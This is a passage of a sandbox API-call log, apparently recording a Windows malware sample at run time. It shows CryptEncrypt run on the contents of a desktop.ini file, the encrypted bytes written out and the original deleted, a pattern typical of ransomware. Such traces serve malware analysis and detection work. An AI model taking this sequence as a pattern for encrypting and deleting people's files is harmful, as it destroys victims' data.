wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.100] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0090.100] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0090.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0090.101] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0090.101] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0090.101] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0090.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0090.102] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0090.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0090.102] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.102] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.102] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.102] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0090.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0090.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9dc0 [0090.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.103] CryptEncrypt (in: hKey=0x9a3bc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x120) returned 1 [0090.103] CharLowerBuffW (in: lpsz="byte[288]", cchLength=0x9 | out: lpsz="byte[288]") returned 0x9 [0090.103] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.103] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ce8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.103] CryptEncrypt (in: hKey=0x9a3bc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29f77c0*, pdwDataLen=0x8cef60*=0x11a, dwBufLen=0x120 | out: pbData=0x29f77c0*, pdwDataLen=0x8cef60*=0x120) returned 1 [0090.103] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.103] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.103] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.103] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.104] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.104] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.104] WriteFile (in: hFile=0x2c4, lpBuffer=0x2a74a80*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a74a80*, lpNumberOfBytesWritten=0x8cf5e4*=0x120, lpOverlapped=0x0) returned 1 [0090.105] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0090.105] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0090.105] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.105] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9b08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.105] CryptDestroyKey (hKey=0x9a3bc0) returned 1 [0090.105] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.105] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.105] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.105] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.106] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.106] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.107] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.107] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.107] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.107] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.107] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.107] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0090.107] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.107] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.107] FreeLibrary (hLibModule=0x76390000) returned 1 [0090.107] CloseHandle (hObject=0x294) returned 1 [0090.108] CloseHandle (hObject=0x2c4) returned 1 [0090.109] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.109] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.109] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x23 [0090.110] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 0x26 [0090.110] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x9a4200 [0090.110] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 1 [0090.111] FindNextFileW (in: hFindFile=0x9a4200, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0090.111] FindClose (in: hFindFile=0x9a4200 | out: hFindFile=0x9a4200) returned 1 [0090.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0090.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.111] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.112] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.112] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.112] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.112] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75fd8 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.113] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 